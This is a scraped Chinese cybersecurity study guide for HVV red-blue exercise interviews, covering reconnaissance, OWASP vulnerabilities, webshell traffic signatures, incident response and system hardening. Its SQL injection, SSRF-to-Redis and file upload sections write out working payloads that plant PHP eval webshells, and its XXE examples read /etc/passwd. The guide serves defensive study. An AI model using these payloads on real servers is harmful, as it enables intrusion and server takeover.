wordpress图片存放地址广州seo关键字推广

wordpress图片存放地址,广州seo关键字推广,做一个网站得做多少个页面,公司网站建设意见【收藏学习】网络安全实战指南#xff1a;护网经验、漏洞分析与应急响应全攻略 本文全面介绍网络安全核心知识#xff0c;涵盖护网面试流程、岗位分类、信息收集技术、各类漏洞原理与利用方法#xff08;SQL注入、XSS、CSRF等#xff09;、应急响应流程及溯源技术。内容从…【收藏学习】网络安全实战指南护网经验、漏洞分析与应急响应全攻略本文全面介绍网络安全核心知识涵盖护网面试流程、岗位分类、信息收集技术、各类漏洞原理与利用方法SQL注入、XSS、CSRF等、应急响应流程及溯源技术。内容从基础到实战系统性强适合网络安全初学者和程序员学习参考是入门到进阶的必备指南。一、护网面试有很多步骤1、投递简历-安全服务公司HR先筛选一下简历交给技术负责人面试一下推荐给安全厂商360、 奇安信 、安恒、绿盟2、安全设备厂商HR筛选一下简历安全设备厂商安排技术笔试和面试技术负责人和项目负责人筛选和面试。3、面试通过安全设备厂商安排项目地是甲方公司如某银行某证券公司等甲方客户也有可能需要面试一下技术。二、是否参加过护网1、护网面试岗位监控岗、研判岗、应急和溯源岗位等。分为初级、中级、高级岗位。2、根据甲方需求分为 3 组监测组、处置组、应急保障和溯源反制组。3、监测组主要监测设备监控判断不出来告警交给研判若确认未成功的真实攻击提交ip和告警截图给处置组封禁ip若需要应急需提交给处置单给应急人员4、处置组封禁ip以及甲方自有人员自有设备处置5、应急保障和溯源反制组应急拿到处置单先和处置组建群沟通根据处置单提出处置建议让处置组操作或者客户授权后操作溯源根据提供的攻击ip和钓鱼邮件进行溯源和反制。三、信息收集篇信息收集什么服务器操作系统IP数据库类型网站CMSWeb容器CDN旁站C段信息域名子域名公司名称注册人社工信息具体站点目录扫描端口扫描漏洞扫面判断目标操作系统的方法大小写Win大小写不敏感Linux敏感ping命令TTL值在默认情况下win是128Linux是64.nmap -O IP值可以查出怎么修改TTL值在 安全加固 中需修改TTL。怎么验证是否绕过CDN使用多地ping的服务查看对应IP地址是否唯一如果不唯一大概率就是存在CDN使用nslookup命令检测查看返回域名解析对应IP地址是否唯一如果不唯一很可能存在CDN工具站长工具http://ping.chinaz.com/爱战网https://ping.aizhan.com/国外ping探测https://asm.ca.com/en/ping.php怎么绕过CDN获取真实IP子域名查询历史DNS解析国外主机解析域名网站漏洞邮件信息SSL证书如何验证找到的IP为真实IP直接访问IP看看响应页面是否和访问的域名一样。探查网站的CMS有什么意义查找已曝光的漏洞。如果开源还能下载相应的源码进行代码审计。根据CMS特征关联同CMS框架站点进行敏感备份文件扫描有可能获得站点备份文件。旁站信息收集的意义和方法。旁站就是与目标网站处于同一服务器的不同网站在目标网站无法攻陷的情况下渗透旁站拿到该服务器的最高权限就可将目标网站拿下。 方法站长工具输入IP值bing搜索引擎查询语法ip:xxx.xxx.xxx.xxx使用fofa语法ip“xxx.xxx.xxx.xxx”C段主机信息收集的意义与方法C段信息的收集的目的是获取与目标相关联的更多设备的信息原理和旁站差不多 方法nmap扫描C段主机nmap -sn ip/24搜索引擎site:xxx.xxx.xxx.*webfinderfofa: ip“xxx.xxx.xxx.0/24”子域名信息收集的意义与方法原理与旁站C段类似主站攻不下去搜索其子域名可能防御没那么厉害。枚举搜索引擎fofa透明证书:https://crt.sh/聚合工具oneforall端口信息收集的方法与常见的端口Nmap:namp -sv -p 1-65535 ip值御剑Masscanzmap 常见端口 FTP 20 FTP服务器真正传输所用的端口用于上传、下载 FTP 21 用于FTP的登陆认证 SSH、SFTP 22 加密的远程登录文件传输 Telnet 23 远程登录在本地主机上使用此端口与远程服务器的22/3389端口连接 SMTP 25 用于发送邮件 DNS 53 域名解析 HTTP 80 用于网页浏览 MySQL 3306 数据库 HTTPS 443 加密的网页浏览端口 TOMCAT 8080 WWW代理开放此端口 redis 6379 远程桌面连接 3389 SQLserver 1433数据包有哪些请求方式常用八种请求方式分别是 GET、POST、HEAD、PUT、DELETE、OPTIONS、TRACE、 CONNECTget 和 post 最常用get请求与post请求的区别数据传输位置get在URL,POST不在url数据长度get有上限post无上限安全性get有风险post相对更安全语义get请求通常用于获取或检索资源不对服务器产生影响 post请求用于提交数据给服务器会对服务器数据库产生影响四、漏洞篇OWASP top101.失效的访问控制2.加密机制失效3.注入包括跨站脚本攻击XSS和SQL注入等4.不安全设计5.安全配置错误6.自带缺陷和过时的组件7.身份识别和身份验证错误8.软件和数据完整性故障9.安全日志和监控故障10.服务端请求伪造SSRF五、SQL注入篇SQL注入的原理以及发生前提SQL注入原理 在数据交互中前端的数据传入到后台进行处理时没有做严格的判断过 滤。导致传入的“数据”拼接到SQL语句中后被当作SQL语句的一部分执 行。从而导致数据库受损被脱裤、数据被删除、甚至整个服务器权限沦陷 漏洞产生原因实现条件 用户对sql查询语句参数可控 原本程序要执行的SQL语句,拼接了用户输入的恶意数据SQL注入的类型1.联合注入 2.堆叠注入 3.宽字节注入 4.cookie注入 5.XFF头注入 6.UA注入user-agent注入 7.Referer注入 8.二次注入 9.base64注入 10.万能密码 1.文件读写 盲注类型 1.基于时间的盲注 sleep() benchmark() 2.基于布尔的注入 3.基于报错的注入 updatexml() extractvalue() floor() exp()防御SQL注入使用参数化查询或预编译语句使用参数化查询也称为绑定参数或预编译语句。参数化查询使用占位符例如问号或冒号来表示查询中的变量然后通过参数绑定的方式将用户提供的数据与查询语句分开。这样可以防止用户输入被错误地解释为SQL代码。输入验证和过滤过滤可以去除或转义输入中的特殊字符以防止它们被错误地解释为SQL代码。可以使用正则表达式或内置的验证函数来验证输入数据并使用转义函数或安全的编码机制来过滤特殊字符。最小权限原则为应用程序连接数据库的账户分配最低限度的权限只提供执行必要操作的权限。不信任外部数据对于从外部来源获取的数据例如用户输入、API调用等应该始终将其视为不可信任的并进行适当的验证和处理。不要直接将外部数据拼接到SQL查询中而是使用参数化查询或预编译语句。使用安全的编程实践遵循安全的编程实践如不在应用程序中直接拼接SQL查询、避免动态拼接查询字符串、避免使用可执行字符串的函数等。SQL注入的WAF绕过方法1.大小写绕过注入2.双写绕过注入3.编码绕过注入4.内联注释绕过注入SQL注入的危害1.获取数据库数据 数据库中存放的用户的隐私信息的泄露脱取数据库中的数据内容脱库可获取网站管理员帐号、密码悄无声息的进行对网站后台操作等。2.网页篡改 通过操作数据库对特定网页进行篡改严重影响正常业务进行与受害者信誉。3.网页挂马 将恶意文件或者木马下载链接写入数据库修改数据库字段值进行挂马攻击。4.篡改数据库数据 攻击数据库服务器篡改或者添加普通用户或者管理员帐号。5.获取服务器权限 列取目录、读取、写入shell文件获取webshell远程控制服务器安装后门经由数据库服务器提供的操作系统支持让攻击者得以修改或控制操作系统。宽字节注入原理由于PHP utf-8编码 数据库GBK编码PHP发送请求到 mysql 时经过一次gbk编码因为GBK是双字节编码所以我们提交的%df这个字符和转译的反斜杠组成了新的汉字然后数据库处理的时候是根据GBK去处理的然后单引号就逃逸了出来。SQL注入如何写入webshell条件1、知道web绝对路径2、有文件写入权限(一般情况只有ROOT用户有)3、数据库开启了secure_file_priv设置然后就能用select into outfile写入webshell查看secure_file_priv的状态命令show VARIABLES like ‘%secure%’ 查看是否有文件读取权限。查看当前用户是否有File权限当secure_file_priv文件导出路径与web目录路径重叠写入Webshell才可以被访问到。知道网站目录的绝对路径union select写入union select ?php eval($_POST[cmd])? into outfile web目录;分隔符写入当union无法使用时还可以利用分隔符写入?id1 INTO OUTFILE 物理路径 lines terminated by ?php eval($_POST[cmd])?# ?id1 INTO OUTFILE 物理路径 fields terminated by ?php eval($_POST[cmd])?# ?id1 INTO OUTFILE 物理路径 columns terminated by ?php eval($_POST[cmd])?# ?id1 INTO OUTFILE 物理路径 lines starting by ?php eval($_POST[cmd])?#log**写入** 新版本的mysql在my.ini中设置了导出文件的路径无法再使用select into outfile来写入一句话木马这时我们可以通过修改MySQL的log文件来获取webshell。show variables like %general%; #查看配置 set global general_log on; #开启general log模式 set global general_log_file 网站目录/shell.php; #设置日志目录为shell地址 select ?php eval($_POST[shell]);? #写入shell set global general_logoff; #关闭general log模式然后就可以在网站目录下创建一个shell.php里边有我们写入的一句话木马打开执行phpinfo六、XSS篇xss的原理和类型原理XSS即跨站脚本攻击是指攻击者利用Web服务器中的代码漏洞在页面中嵌入客户端脚本通常是一段由JavaScript编写的恶意代码当信任此Web服务器的用户访问Web站点中含有恶意脚本代码的页面用户浏览器会自动加载并执行该恶意代码从而达到攻击的目的。XSS的危害与防御危害窃取受害者的敏感信息、绕过访问控制、利用受害者的身份进行攻击、篡改网页内容、发起钓鱼攻击等等。窃取cookie抓取屏幕截图获取键盘记录重定向植入广告恶意链接网页钓鱼网页挂马结合网页挂马或者其他工具(Metasploit)获取服务器或者操作系统权限。防御对用户输入进行严格的过滤和验证、采用安全的编程语言和框架、使用安全的API和库函数、使用HTTP-only Cookie、限制用户输入等等。此外还可以使用一些安全工具和技术来检测和防御XSS漏洞例如Web应用程序防火墙WAF、安全编码规范和审计、反射性XSS漏洞检测等等。七、CSRF漏洞CSRF漏洞原理CSRF(Cross -Site Request Forgery ),跨站请求伪造攻击通常缩写为CSRF或者XSRF , 是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS)但它与XSS非常不同XSS利用站点内的信任用户而CSRF则通过伪装成受信任用户请求受信任的网站CSRF漏洞分类GET型POST型CSRF漏洞的危害盗取用户敏感信息如登录信息、支付信息等。非法修改用户数据如发表恶意言论、篡改个人资料等。执行任意操作如利用受害者账号进行网络攻击等CSRF漏洞的防御使用CSRF Token机制将随机生成的Token与表单、链接等操作绑定使攻击者无法伪造请求。增加足够的身份验证机制如密码、短信验证等减少攻击者利用受害者身份的可能性。使用HTTP Referer验证判断请求来源是否合法。避免使用GET方式提交表单减少攻击者通过获取URL进行攻击的可能性。对敏感操作进行二次确认提示用户确认操作行为。八、SSRF漏洞SSRF漏洞原理SSRF服务器端请求伪造)是一种由攻击者构造形成由服务器发起请求的一个安全漏洞.(注意是服务器发起请求)攻击场景当攻击者想要访问服务器B上的服务但是由于存在防火墙或者服务器B是属于内网主机等原因导致攻击者无法直接访问。如果服务器A存在SSRF漏洞这时攻击者可以借助服务器A来发起SSRF攻击通过服务器A向主机B发起请求达到攻击内网的目的。SSRF怎么结合Redis相关漏洞利用主要通过两种协议dict协议和gopher协议。dict协议利用redis相关漏洞探测**端口**ssrf.php?**urldict://x.x.x.x: 端口 端口 端口 利用burpsuite爆破端口**探测是否设置弱口令ssrf.php?urldict://x.x.x.x:6379/info 已知端口利用info探测是否设置了密码爆破密码ssrf.php?urldict://x.x.x.x:6379/auth: 密码 密码 密码 利用burpsuite爆破密码写入webshell1. urldict://xxx.xxx:6379/config:set:dir:/var/www/html 切换文件目录 2. urldict://xxx.xxx:6379/config:set:dbfilename:webshell.php 设置保存文件名 3. urldict://xxx.xxx:6379/set:webshell:\x3c\x3f\x70\x68\x70\x20\x70\x68\x70\x69\x6e\x66\x6f\x28\x29\x3b\x3f\x3e //利用dict协议写入webshell 以上的字符编码是?php phpinfo();?的十六进制 4. urldict://x.x.x.x:6379/save 保存 1. urldict://xxx.xxx:6379/config:set:dir:/var/www/html 切换文件目录 2. urldict://xxx.xxx:6379/config:set:dbfilename:webshell.php 设置保存文件名 3. urldict://xxx.xxx:6379/set:webshell:\x3c\x3f\x70\x68\x70\x20\x70\x68\x70\x69\x6e\x66\x6f\x28\x29\x3b\x3f\x3e//利用dict协议写入webshell 以上的**字符编码是的十六进制** 4.ssrf.php?urldict://x.x.x.x:6379/save 保存 dict协议利用计划任务反弹shell或者写入ssh公钥的手段类似gopher**协议利用redis未授权访问漏洞写入webshell** 常规利用步骤 set x “\n\n\n?php eval($\\\_POST\[redis\]);?\n\n\n” config set dir /var/www/html config set dbfilename shell.php save 两次url编码后构造url//第一次url解码和第二次url解码 //同理其他类似计划任务反弹和写入ssh公钥等getshell方式相似SSRF漏洞经常存在的位置分享通过URL地址分享网页内容转码服务在线翻译图片加载与下载通过URL地址加载或下载图片图片、文章收藏功能未公开的api实现以及其他调用URL的功能SSRF漏洞的危害攻击者可以在服务器端内部网络中进行扫描和攻击。向内部任意主机的任意端口发送payload来攻击内网服务攻击内网的web应用如直接SQL注入、XSS攻击等攻击者可以通过向本地端口发送请求来绕过防火墙等网络安全设备。攻击者可以利用SSRF漏洞进行钓鱼攻击、内网渗透等攻击。DOS攻击请求大文件始终保持连接Keep-Alive Always利用file、gopher、dict协议读取本地文件、执行命令等可以无视网站CDNSSRF漏洞防御禁止跳转过滤返回的信息如果web应用是去获取某一种类型的文件。那么在把返回结果展示给用户之前先验证返回的信息是否符合标准。统一错误信息避免用户可以根据错误信息来判断远程服务器的端口状态。限制请求的端口比如80,443,8080,8090。禁止除HTTP和HTTPS外的协议比如说仅仅允许http和https请求。可以防止类似于file:///,gopher://,ftp://请求等引起的问题。对请求地址设置白名单或者限制内网IP九、XXEXXE漏洞的原理及危害如果Web应用的脚本代码没有限制XML引入外部实体从而导致用户可以插入一个外部实体并且其中的内容会被服务器端执行插入的代码可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。如何构建XXE攻击1直接通过DTD外部实体声明!DOCTYPE a [ !ENTITY a SYSTEM file:///etc/passwd ]2通过DTD文档引入外部DTD文档再引入外部实体声明! DOCTYPE a SYSTEM http:/test.com/abc.dtddtd文档内容!ENTITY b SYSTEM file:///etc/passwd 3通过DTD文档引入外部实体声明!DOCTYPE a [ !ENTITY % d SYSTEM http:/test.com/abc.dtd %d; ]dtd文档内容!ENTITY b SYSTEM file:///etc/passwd XXE漏洞的防御禁用外部实体的引入比如使用libxmldisableentity_loadertrue等方式。过滤如SYSTEM等敏感关键字防止非正常、攻击性的外部实体引入操作。十、文件上传漏洞文件上传漏洞的原理文件上传漏洞是指用户上传了一个可执行的脚本文件并通过此脚本文件获得了执行服务器端命令的能力。?php eval($_POST[666]);?文件上传漏洞的危害上传webshell,控制服务器、远程命令执行上传系统病毒、木马文件进行挖矿、僵尸网络进行提权操作修改web页面实现钓鱼、挂马等操作。进行内网渗透。文件上传功能的监测点有哪些客户端的JS检测主要检测文件名后缀服务端检测MINE类型检测、文件后缀名、文件格式头文件上传漏洞常见上传点图片上传png,jpg.文件上传:php头像上传:Flash上传:上传文件名:击者可以通过构造含有特殊字符的文件名来绕过服务器的检查以实现攻击的目的十一、文件包含漏洞文件包含漏洞原理服务器在解析动态页面时将用户提交的输入作为参数传递给后台处理程序如果没有对用户输入进行充分的过滤和验证攻击者可以通过构造特殊的输入让服务器包含恶意文件或者代码进而实现攻击目的。文件包含函数PHPInclude()、Require()、Include_once()、Require_once()十二、RCE远程代码执行RCE漏洞原理简称RCE指攻击者能够在远程系统上执行恶意代码的一种攻击方式。攻击者通常利用漏洞将恶意代码注入到受攻击的应用程序或操作系统中从而实现在远程系统上执行任意代码的目的.——能执行任意代码导致它的危害非常高。 注意RCE不同于其他漏洞它更多的表示一种结果其他漏洞导致了RCE的结果。常见编程语言执行函数在编程语言中有一些执行函数可能会带来安全风险因为它们允许执行动态代码或系统命令。以下是一些常见编程语言中的执行函数和对应的语言名称 Python: eval(): Python的内置函数用于执行字符串中的Python代码。 exec(): Python的内置函数用于执行包含Python代码的字符串或代码对象。JavaScript: eval(): JavaScript的全局函数用于执行包含JavaScript代码的字符串。PHP: shell_exec() eval(): PHP的函数用于执行包含PHP代码的字符串。 exec(): PHP的函数用于执行系统命令。Java: Runtime.exec(): Java的类方法用于执行系统命令。 ProcessBuilder: Java的类用于创建进程并执行系统命令。C#: Process.Start(): C#的方法用于执行系统命令。 System.Diagnostics.Process: C#的类用于创建进程并执行系统命令。Ruby: eval(): Ruby的方法用于执行包含Ruby代码的字符串。 system(): Ruby的方法用于执行系统命令。Go: os/exec 包: Go的标准库中的包用于执行系统命令。Shell 脚本: eval: 用于执行包含 Shell 脚本代码的字符串。 $(): 用于执行命令并返回输出。 这些函数和方法在正确使用的情况下是有用的但在接受用户输入或不充分验证的情况下它们可能导致安全漏洞。因此在编写代码时务必小心使用这些执行函数并始终对用户输入进行充分验证和过滤以防止潜在的安全风险。十三、流量分析篇CS是什么东西知道怎么使用吗简介CobaltStrike是一款渗透测试工具被业界人称为CS。CobaltStrike分为客户端与服务端服务端是一个客户端可以有多个可用于团队分布式协同操作。功能CobaltStrike 集成了端口转发服务扫描自动化溢出多模式端口监听 windows exe 木 马生成windows dll 木马生成java 木马生成office 宏病毒生成木马捆绑。钓鱼攻击等功能。使用一般使用步骤就是先启动服务端然后启动客户端连接获得一个可视化的界面新建监听器来接收会话生成木马文件(常见.exe可执行文件office宏病毒html应用程序类型的后门文件)上传到受害者主机当受害者运行该木马文件时目标主机就在CS上线了。对比正常的http流量CS的http通信流量具有以下几个特征A. 心跳包特征a) 间隔一定时间均有通信且流级上的上下行数据长度固定B. 域名/IP特征a) 未走CDN、域前置的域名及IP暴露b) 走CDN、域前置的真实IP会被隐藏C. 指令特征a) 下发指令时通过心跳包接收指令这时 server 端返回的包更长甚至包含要加载的dll模块数据。b) 指令执行完后client端通过POST请求发送执行的结果数据body部分通过加密和base64编码。c) 不同指令执行的时间间隔不一样可以通过POST请求和GET请求的间隔进行判断。D. 数据特征a) 在请求的返回包中通信数据均隐藏在jqeury*.js中。常见的webshell连接工具流量中国菜刀连接过程中使用base64编码对发送的指令进行加密其中两个关键payload z1 和 z2名字都是可变的。然后还有一段以QG开头7J结尾的固定代码。蚁剑默认的user-agent请求头是antsword xxx不过可以修改。一般将payload进行分段然后分别进行base64编码一般具有像eval这样的关键字然后呢大概率还有ini_set(“display”,“0”);这段代码。冰蝎php代码中可能存在evalassert等关键词jsp代码中可能会有getclass()getclassLoader()等字符特征。冰蝎2.0第一阶段请求中返回包的状态码是200返回内容是16位的密钥。建立连接后的cookie格式都是CookiePHPSessidxxxx path/特征。冰蝎3.0请求包中的conten-length字段是5740或者5720然后请求头也具有特征信息不过这个比较长没有记住。哥斯拉1.jsp代码中可能会具有getclassgetclassLoader等关键字payload使用base64编码等特征。php和asp则是普通的一句话木马。2.在响应包的cache-control字段中有no-storeno-cache等特征。3.所有请求中的cookie字段最后面都存在特征。webshell防御1.建议用户通过ftp来上传、维护网页尽量不安装asp的上传程序。2.对asp上传程序的调用一定要进行身份认证并只允许信任的人使用上传程序。3.asp程序管理员的用户名和密码要有一定复杂性不能过于简单还要注意定期更换。4.到正规网站下载程序下载后要对数据库名称和存放路径进行修改数据库名称要有一定复杂性。5.要尽量保持程序是最新版本。6.不要在网页上加注后台管理程序登陆页面的链接。7.为防止程序有未知漏洞可以在维护后删除后台管理程序的登陆页面下次维护时再通过上传即可。8.要时常备份数据库等重要文件。9.日常要多维护并注意空间中是否有来历不明的asp文件。10.尽量关闭网站搜索功能利用外部搜索工具以防爆出数据。11.利用白名单上传文件不在白名单内的一律禁止上传上传目录权限遵循最小权限原则。对数据包或日志的分析思路用流量监测的安全设备比如天眼查看报文分析报文里和 host 和网站目录路径查看是否可疑使用微步查询 host 是否为恶意使用 wireshark 对数据包深度分析看一下请求的网站路径源 IP 与目的 ip 地址host 字段的值以及发包内容等。工具有 wearshark网站的话微步在线。如何区分扫描流量和手动流量扫描流量和手动流量的区别在于其产生的方式和行为特征因此可以通过以下几种方法来查看区分它们查看流量来源扫描流量通常是由自动化工具或蠕虫病毒等程序生成的因此其源 IP或者发起请求的主机通常不固定而手动流量则来自人工操作的设备其请求的 IP 地址和用户代理信息都会有所不同。检测流量频率和规律扫描流量通常会呈现出周期性、规律性的访问行为例如连续大量的 TCP SYN请求等。而手动流量则通常难以呈现出明显的规律和周期性。观察流量的请求路径和参数扫描流量通常是为了探测系统漏洞和弱点而产生的它们通常会对一些已知的 URL和参数进行大量的尝试并使用一些特殊的 HTTP 头部信息。而手动流量则更加多样化可能会包含更丰富的请求路径和参数。分析流量的响应状态码和长度扫描流量通常会通过检测返回的状态码和页面长度等信息来判断目标是否存在漏洞或弱点。手动流量则通常会具有更加正常的响应状态码和页面长度。总之通过综合分析流量来源、访问规律、请求路径和参数以及响应状态码等特征我们可以比较准确地区分扫描流量和手动流量并采取相应的防御措施。日志与流量分析日志和流量分析是网络安全领域中常用的两种技术。它们都可以帮助安全人员更好地了解系统的状态检测和预防威胁。日志分析是指对服务器、应用程序等产生的日志进行收集、存储、分析和处理以便了解系统的运行状况和发现异常事件。通过对日志数据的统计和分析可以追踪用户活动、系统错误、安全事件等以及发现潜在的风险和漏洞。比如通过分析登录日志可以检测到恶意登录尝试通过分析访问日志可以了解网站的被攻击情况。流量分析是指对网络流量进行收集、存储、分析和处理以便了解网络连接的状态检测和预防网络攻击。通过对流量数据的统计和分析可以追踪网络通信、检测威胁和漏洞比如检测恶意流量、DDoS攻击等。流量分析通常需要使用专业的工具和技术包括网络协议分析、流量捕获和分析软件等。综上所述日志和流量分析是网络安全中非常重要的技术它们可以帮助安全人员发现和解决潜在的安全问题并维护系统和网络的正常运行。十四、权限维持和应急响应篇怎么建立隐藏用户研判的思路1.首先对攻击的来源进行判断是内对内外对内还是内对外的情况。2.依据设备的告警信息结合具体情况来分析攻击行为的类型比如说告警SQL注入攻击那我们就去查看一下请求数据包里面是否有单引号SELECT等敏感字符返回数据包里面是否有SQL语法报错等信息有的话就可以初步判断该攻击行为是SQL注入攻击。3.然后就是根据攻击特征来分析攻击行为使用了什么技术或者说工具比如说攻击的频率数据包的信息等等。比如说在使用AWVS或者APPSCAN等工具在扫描的时候很有可能在请求数据包的user-agent里面就有相关的信息。同样结合告警信息和具体情况来判断攻击行为的危害程度比如说检测到多条攻击成功告警和内对内及内对外攻击告警这个时候就需要尽快的交给应急组了。4.结合设备告警信息及具体情况分析攻击意图比如说攻击者的目标是主站还是旁站是主机还是域控不同的攻击意图对于后续的处理也不同。5.最后根据我们掌握的信息采取相应的处置方式比如说告警信息是误报说明设备需要策略优化不需要处置。告警信息是尝试攻击暂时对资产没有影响就需要后续持续关注攻击成功时能够做到及时上报。如果告警确认不是误报并且攻击成功时我们就需要迅速上报及时采取应急响应。应急响应的思路简单版 Linux 入侵排查思路; 1账号安全,2历史命令,3检查异常端口,4检查异常进程,5检查开机启动项,6检查定时任务,7检查服务,8检查异常文件,9检查系统日志。 1 检查系统账号安全2.检查异常端口、进程3.检查启动项、计划任务、服务 4.日志分析 1. 日志中搜索关键字:如:union,select等 2. 分析状态码:1xx information 200 successful 300 redirection 4xx client error 5xx server error 查找可疑文件,webshell 分析文件修改日期 系统日志分析收集信息收集客户信息和中毒主机信息包括样本判断类型判断是否是安全事件何种安全事件勒索、挖矿、断网、DoS 等等抑制范围隔离使受害⾯不继续扩⼤深入分析日志分析、进程分析、启动项分析、样本分析方便后期溯源清理处置杀掉进程删除文件打补丁删除异常系统服务清除后门账号防止事件扩大处理完毕后恢复生产产出报告整理并输出完整的安全事件报告windows应急响应时排查分析的相关细节答可疑账号排查 lusrmgr.msc1.检查服务器是否有弱口令。比如空口令或者密码复杂度不够。2.高危端口是否对外开放比如SSH服务22端口RDP服务3389端口等。3.查看服务器是否有可疑账号。手工方面lusrmgr.msc命令查看用户和组查看是否有新增账号隐藏账号克隆账号。 工具方面比如利用D盾等工具来检测隐藏账号。 4.结合日志分析 eventvwr.msc 查看管理员登录时间相关事件是否有异常。敏感事件ID4624 登录成功 4625 登录失败 4672 使用超级管理员进行登录 4720 创建用户 5.使用query user查看当前系统的会话比如查看是否有人使用远程登录服务器。可疑进程和服务排查 taskmgr services.msc1.查看CPU内存网络等资源是否有可疑状况。比如CPU占用率过高可能是中了挖矿病毒磁盘空间大量占用可能是脚本或病毒大量生成和复制隐藏文件。2.检查进程名某些进程名是大量随机的情况比如hrlC3.tmp、hrlD5.tmp、hrl6.tmp、hrlEE.tmp等多个名字相似的进程基本上可以断定是异常进程。 异常进程名伪装成系统进程或者说常见服务的进程名此时可以通过进程描述来判断并且需要手工对比。 3.检查进程和服务描述修改时间或者数字签名是否有异常。4.利用工具进行检测比如Process Hunter或者火绒剑等专门针对进程服务信息的排查分析工具主要查看的是公司名描述安全状态和启动类型等方面来排查。可疑启动项排查 msconfigmsconfig或者任务管理器中的启动项查看名称发布者和启动影响以及右键查看属性来看数字签名和修改时间。结合工具进行排查比如火绒剑等工具会将启动项分类为登录驱动程序计划任务映像劫持等利用分析排查可疑文件排查1.各个磁盘的Temp/tmp目录中是Windows产生的临时文件查看有无异常文件。2.Recent目录会记录最近打开的文档以及程序的相关记录。3.查看文件的创建时间修改时间和访问时间比如说攻击者利用菜刀等工具对文件进行修改会改变修改时间如果修改时间在创建时间之前那就是很明显的可疑文件。4.windows系统我的电脑快速访问可以看到最近使用的文件比如说图片或者压缩包等文件的使用历史和文件路径都会显示。恶意样本排查1.恶意样本指的一般是webshell病毒木马或者后门程序或文件可以根据设备的告警信息来查找相关路径再排查相关的进程和启动项。2.不知道路径的话可以利用相关的安全设备来进行检测比如说通过D盾河马查杀等工具对webshell可能存在的目录进行一个排查查杀利用常规的防火墙软件来对全盘或者可疑目录扫描病毒。常见的应急响应事件分类web入侵网页挂马、主页篡改、Webshell系统入侵病毒木马、勒索软件、远控后门网络攻击DDOS攻击、DNS劫持、ARP欺骗Windows应急响应常用命令查看账户net user查看隐藏账户lusrmgr.msc在Domains\Account\Users\Names下可以看到隐藏用户登录时间查看eventvwr.msc查看Windows日志链接: link查看端口情况netstat -ano查看进程情况tasklist|findstr “进程号”杀死进程taskkill /f /t /im httpd.exe查看软件环境msinfo32查看启动项【开始】——【所有程序】——【启动】、msconfig、查看计划任务查看服务services.msc组策略gpedit.msc查找最近打开文件%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\搜索恶意内容文件findstr /m/i/s “eval” *.php、或者用everything、filelocator.查找最新修改文件使用everything 。everything—修改时间查看系统版本以及补丁信息:无法连接3389的情况a.3389端口处于关闭状态b.远程桌面默认端口号已被修改c.防火墙拦截d.处于内网环境e.超过了服务器最大连接数f.管理员设置了权限指定用户才能通过3389端口进行远程桌面访问windowst入侵排查思路1.检查系统账号安全查看服务器是否有弱口令远程管理端口是否对公网开放使用netstat -ano命令、或者问服 务器管理员 lusrmgr.msc命令查看服务器是否存在可疑账号、新增账号如有管理员群组的 Administrators里的新增账户如有请立即禁用或删除掉 用 D 盾或者注册表中查看服务器是否存在隐藏账号、克隆账号 结合日志查看管理员登录时间、用户名是否存在异常 检查方法WinR 打开运行输入“eventvwr.msc”回车运行打开“事件查看器” 导出 Windows 日志–安全利用 Log Parser 进行分析2.检查异常端口、进程netstat -ano检查端口连接情况是否有远程连接、可疑连接 任务管理器-进程3.检查启动项、计划任务、服务4.检查系统相关信息查看系统版本以及补丁信息 查找可疑目录及文件5.日志分析如何查看系统内存shell先判断是通过什么方法注入的内存马可以先查看 web 日志是否有可疑的 web 访问日志如果是 filter 或者 listener 类型就会有大量 url 请求路径相同参数不同的或者页面不存在但是返回 200 的查看是否有类似哥斯拉、冰蝎相同的 url 请求哥斯拉和冰蝎的内存马注入流量特征与普通 webshell 的流量特征基本吻合。通过查找返回 200 的 url 路径对比 web目录下是否真实存在文件如不存在大概率为内存马。如在 web 日志中并未发现异常可以排查是否为中间件漏洞导致代码执行注入内存马排查中间件的 error.log 日志查看是否有可疑的报错根据注入时间和方法根据业务使用的组件排查是否可能存在 java 代码执行漏洞以及是否存在过 webshell排查框架漏洞反序列化漏洞。详细 链接: linklinux登录日志查看文件linux 日志文件说明 日志默认存放位置/var/log/ 查看可登录的账户 cat/etc/passwd|grep ‘/bin/bash’ 查看所有用户最后的登录信息 lastlog 查看用户最近登录信息 last 其中/var/log/wtmp 存储登录成功的信息、btmp 存储登录失败的信息、utmp 存储当前正在登录的信息 查看当前用户登录系统情况 who/var/log/message 系统启动后的信息和错误日志是 Red Hat Linux 中最常用的日志之一/var/log/secure 与安全相关的日志信息/var/log/maillog 与邮件相关的日志信息/var/log/cron 与定时任务相关的日志信息/var/log/spooler 与 UUCP 和 news 设备相关的日志信息/var/log/boot.log 守护进程启动和停止相关的日志消息/var/log/wtmp 该日志文件永久记录每个用户登录、注销及系统的启动、停机的事件普通的加固手段普通的加固手段包括以下几种更新补丁定期更新操作系统、应用程序的补丁修复已知的漏洞和安全问题。强化口令策略采用复杂、难以猜测的密码并进行定期更换。同时可以启用账户锁定、多次失败尝试限制等功能提高口令安全性。加强身份验证采用多因素身份验证技术例如使用硬件令牌、生物特征等方式确保只有授权用户才能访问系统。安装防病毒软件安装并及时更新防病毒软件定期进行全盘扫描和实时监控以便及时发现和处置潜在的恶意软件。关闭不必要服务关闭系统中不必要的服务和端口降低攻击面避免被利用。限制访问权限根据业务需要设置合理的访问权限对于未授权的用户或者设备进行限制提高系统的安全性。数据备份与恢复定期备份重要数据并将其存储在安全可靠的位置。在出现故障或事件时能够快速恢复数据避免数据丢失和系统停机。总之以上这些普通的加固手段可以帮助提高系统的安全性和稳定性并且也是网络安全基础建设的关键步骤。在实际操作中需要根据具体情况和需求结合其他安全措施来进行综合加固。同时需要注意及时更新和检查以确保系统始终处于安全状态。了解过系统加固吗账户安全windows比如设置登录时不显示上次登录的用户名防止弱口令爆破。设置账户锁定策略比如说登录行为限制次数达到次数后锁定多长时间。linux禁用root之外的超级用户 使用password -l 用户名命令来锁定用户 -u解锁限制普通用户使用sudo提权或者说限制提权的权限大小锁定系统中多余的自建账号设置账户锁定登录失败锁定次数锁定时间 faillog -u 用户名命令来解锁用户口令安全windows设置密码必须符合复杂性要求比如设置时数字大写字母小写字母特殊字符都要具备设置最小密码长度不能为0设置不能使用历史密码linux检查shadow中空口令账号修改口令复杂度设置密码有效期vim /etc/login.def命令服务与端口收敛关闭或者限制常见的高危端口比如说22端口(SSH)23端口(Telnet)3389端口(RDP)compmgmt.msc排查计划任务linux上iptables封禁IP或者限制端口文件权限管理linux上chmod修改文件权限 